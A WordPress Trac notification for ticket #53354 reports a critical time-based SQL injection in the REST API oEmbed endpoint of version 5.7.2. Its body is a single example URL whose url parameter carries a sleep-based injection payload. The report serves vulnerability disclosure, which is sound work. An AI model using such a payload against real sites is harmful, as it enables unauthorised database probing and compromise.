[wp-trac] [WordPress Trac] #53354: Time-based SQL injection
WordPress Trac
noreply at wordpress.org
Mon Jun 7 19:10:10 UTC 2021
#53354: Time-based SQL injection
--------------------------+-----------------------------
Reporter: hossein1992 | Owner: (none)
Type: defect (bug) | Status: assigned
Priority: normal | Milestone: Awaiting Review
Component: REST API | Version: 5.7.2
Severity: critical | Keywords:
Focuses: |
--------------------------+-----------------------------
https://example.com/wp-
json/oembed/1.0/embed?url=https://example.com%2f'%2b(select*from(select(sleep(15)))a)%2b'
--
Ticket URL: <https://core.trac.wordpress.org/ticket/53354>
WordPress Trac <https://core.trac.wordpress.org/>
WordPress publishing platform
More information about the wp-trac
mailing list